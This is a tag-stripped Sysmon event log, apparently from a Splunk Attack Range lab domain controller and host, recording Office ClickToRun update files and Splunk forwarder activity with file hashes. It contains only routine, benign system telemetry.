Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xmlMD5=0BB0ED5CA6E2F074866FD37928E842C3,SHA256=CC93E037AF01991CA0550C64CFC05A4EF9D1681735918ADF3442ADF8CDE97C10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065050Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xmlMD5=B8C8BB53C390AD68A010E817BC0B561A,SHA256=90EE77CD171F83917E140D271DC4AED487A9AD5EB65C51934BDB5DD4C83BED7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065049Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xmlMD5=752D09D283D4959BE47163D04C60A438,SHA256=0DBC30CD8696CD9A2AAA8484C1EBDA1DA8EFD7E00A6798F94D75EEB13C26DED7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000065048Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:55:07.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\C2R32.dll2021-04-20 14:55:07.517 11241100x800000000000000065047Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:55:07.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\AppvIsvSubsystems32.dll2021-04-20 14:55:07.517 23542300x800000000000000065046Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.361{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=340AE7C086F23EF398A758C3A90B238D,SHA256=C5D696C9369C68E2105EF6D5D0C8E5BA0F53908B3FB5257C478B63229B78D8F0,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000065045Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:55:07.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\C2R64.dll2021-04-20 14:55:07.330 11241100x800000000000000065044Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:55:07.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\AppvIsvSubsystems64.dll2021-04-20 14:55:07.330 23542300x800000000000000049712Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:07.377{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B873BCD3DA5C7DFAA3C8F9B8ECA83967,SHA256=DB574AB93BA09525E158F122F903BA6C00AB9494009B1929689C1623217E9006,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065791Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152606.WMFMD5=D36AB9748730A913ABE0FFD4C7224473,SHA256=CEE6E12E69AFE36ACA8F49CF05768D9CB8B901785553086576117B2504E9C933,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065790Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152602.WMFMD5=744234A56AAC3AA45A0E53DC19642576,SHA256=9D45055A10A8EE92302A2FCDF471C875804D05A157C6C521B1889110B454EEC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065789Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152600.WMFMD5=C293548E46A9DB84F6FFD32DA9CC23D2,SHA256=824C9686A9D9CAAFA2A71CAFEE699C629E6B3E540625F833F3ED3CEF7AB20466,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065788Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152594.WMFMD5=A741BE115F7D132B5063D307A22314E4,SHA256=027921B0C09DE2B0FB3501A423B328C693AD34BBB5AA73237ECFA1DB9DCFE0F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065787Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152590.WMFMD5=27A537FC556D66111230458EDF534FF5,SHA256=063EBF2CB6D0DEC87262DA7FD68178FF5D3E208B68E0AE637A82C84A55879874,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065786Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152570.WMFMD5=AAAB2D0344E77CB111E788B4EE9322FC,SHA256=A6260E443EA28BE796B02CEEF88CE3201493935AB33560310C031F007E32D621,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065785Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152568.WMFMD5=4CACF667B4598C93B3A26B643C0A3D96,SHA256=36B3B651782CC23CF766CCFA04CD2AED977C7FDFBAE9C0518E2C0872C4389E1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065784Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152560.WMFMD5=A49DE5E78A8956DB5962A2B7D692E057,SHA256=831B94AE7B0C35C756F6DD805BB1987B9263CEC1B5EBE24FBEFF0D0FAF9C7692,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065783Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152558.WMFMD5=4D85D2AB71E00BA52A54DC3E3D6373A0,SHA256=4C68AEA800358EFC61F2782C45E6BE30B2C6D71264A2C0BF96EE9564631D48DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065782Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152556.WMFMD5=656971D8FC4F7E637FA63348B1CADA3A,SHA256=DB113746404433552DAAD435F507A867DC74EDA12D47ECF474BDB065823B5926,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065781Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152436.WMFMD5=AB33E4363D60FB79AB5A84D667D5A227,SHA256=46F6E5B59BAC71246DA17CCAAAFB62CBB0B2F1DC5296BCD653B3B3FF806D26F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065780Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152432.WMFMD5=A73C07E0CBE4190B33A5E9F2464B3893,SHA256=A06BABDA3CEC394C7AD44E689723CCCD06C2685E35549621994F1707ECBD9D5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065779Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152430.WMFMD5=9E4357B9AC6A874A8B3214FD2DF22D52,SHA256=96B0FA89CBAC57BD610730DB11A53E0826643E64372BF8BB8A0F4863A65B7F0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065778Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0152414.WMFMD5=32C408E70297121B24F6B63B3AB48753,SHA256=300A8F4CF8529DE4E6C67AFC5B4B2E84BC41E255CFC978AB317BAE8C9EDB7F4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065777Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0151581.WMFMD5=A7D34F6A36C6B68D96B427B95FE49CC3,SHA256=CB4696424AD1E7CFD3ADB31E8E49D4E3A237120AD6B4186EE04D823EE9679530,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065776Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0151073.WMFMD5=2A1A02EA230FB5A5B92E8773E96FCD81,SHA256=55054CAA6C5B71F351A8852D1A1F1BC06C95ED2BC6B9C41BF63D807545D66460,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065775Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0151067.WMFMD5=62B7C9D25E9B4D3B5A3DD60CCEDA239F,SHA256=5FD8819AB41E8ED3676A6A5B02549F447F8F39D255812984770B2CCB9E18CEFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065774Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0151063.WMFMD5=F94BB02392C9C939463328D8CF45FEB2,SHA256=D0E150C42D751809D05BDDC91B9E3B9287E6E7898C8C485FE106134CD55EDB90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065773Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0151061.WMFMD5=121F6490E062B1E86BD4C9ECE5D92200,SHA256=50F5CF7DA0CE58F37A3F263BA6EE933985D1A5EB489AC0B97938728ACD690020,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065772Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0151055.WMFMD5=AE710368F97C6FD66240E6F5A7CF346B,SHA256=AE06F8243DE414B4CDF56AB3D468A9334D5D79074666A9ED686F684252724025,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065771Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0151047.WMFMD5=912308C3A4002C3C2014C2F56D05ADA5,SHA256=40941B9A78F403C204E9C1E299329AF7DBDB16E0ADFE8A8E3335E97388174606,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065770Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0151045.WMFMD5=FF8DB1D3EF3ADCC70D81CB5AAF8303E5,SHA256=F337752B160F38F8D9552B9996CDB7A3C217DA975D9738710130D33286864922,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065769Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0151041.WMFMD5=914B229F1CAA0020010D0CBEEE636B0F,SHA256=019E01137DDC7A1E59659E41EC9EC3E4A2D47F6208EA61C157DA629AB206A290,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065768Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0150861.WMFMD5=5F4118DBDBA1821ABF618207E1D91722,SHA256=599C335B3DDC04EFA96DBED2452304AB41F16979E09E97C728A92F132CC066F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065767Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0150150.WMFMD5=9E468A49DF081866D5F5609CBF8E652A,SHA256=C1DCA03CF7A8A90F9BF43CA160B2C0E3A708014EAF188B00F18EE79D69B0AD4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065766Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0149118.JPGMD5=E2D4E57176F5A0B7BD65198D5A2703AE,SHA256=EC037BDAAA860F96C8CB5E0B7BDEE629F3035D29715B380592828B9AADCDB49A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065765Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0149018.JPGMD5=39DE0B970C66D5D5873F1D92DFC45303,SHA256=FAE1CAFC9BD8B5D3322D069E1ADEA6A60EF1F7B9561BE98B02FB20BB3B3598ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065764Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0148798.JPGMD5=576424F8A3B169660825AD9D0BF54874,SHA256=A66D1A667097DA70D1C16CAD3714097057389753E68DA3990937EE66575056D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065763Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0148757.JPGMD5=4983569052310E858F87F050D6989F1D,SHA256=6E39F33FB29EB4494E2450BF79256C693CD1B0E9B9B2ADACBB612C2665454BDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065762Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0148309.JPGMD5=D78C28D364EBF14EC7AC59FC889611B9,SHA256=7A5559B132543608783789421CF532D4ECF1C50B8F93171F9123D1AC08EBE783,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065761Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0146142.JPGMD5=4F0B544A16767212A0BC092EEFC71D68,SHA256=13B5A98C0A177F59D94513AA29F0D9F195C5D9B97106F383B915AB8B179B7954,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065760Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0145904.JPGMD5=B9CDA8F7DCECD06829999223178E888F,SHA256=7EAF24B293849DCAC502AEDE4D11031EE3D261D15108EE7681F0014E42A76B8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065759Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0145895.JPGMD5=D8FB0C3E52FC8ABC07D92869315A1C96,SHA256=4C53C3B52A160380564A892557DF3BE8DC35E58E00E0E5DCAAB856F2666C667C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065758Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0145879.JPGMD5=C736386E2DE22409764E6C8BDFF42598,SHA256=9FB6D8D98E7399511F3EDD4B7609076345DF8ED67A1B1BC4EF3E9EF5D2EFF891,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065757Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0145810.JPGMD5=1D6C738DF79B6E138005712E59C91B69,SHA256=248D3064DB5599FA9B6FCE515CE2F7CEC4B067875D6F5CB5AB3D1713DCBC64AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065756Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0145707.JPGMD5=C57E8E779CADBE7EF05016F7D0AE1EA5,SHA256=831AAA6D335F9B60ACD69D14C6926A2B0052C771D27E5A06B83D366639F8F824,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065755Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0145669.JPGMD5=21F7AC57587E01C238491E4018D6D95A,SHA256=B95B4A759F7643D60448E42AA3030D55483D3E36A024E090290A03C88EE2F982,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065754Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0145373.JPGMD5=BD3E0A84DEE16BEFE59B284C06ED809C,SHA256=AA18B693F1036F1E949AF7FA6633007EC0FAC1F41B39FC3F3EBAE86EA178DD97,IMPHASH=00000000000000000000000000000000falsetrue 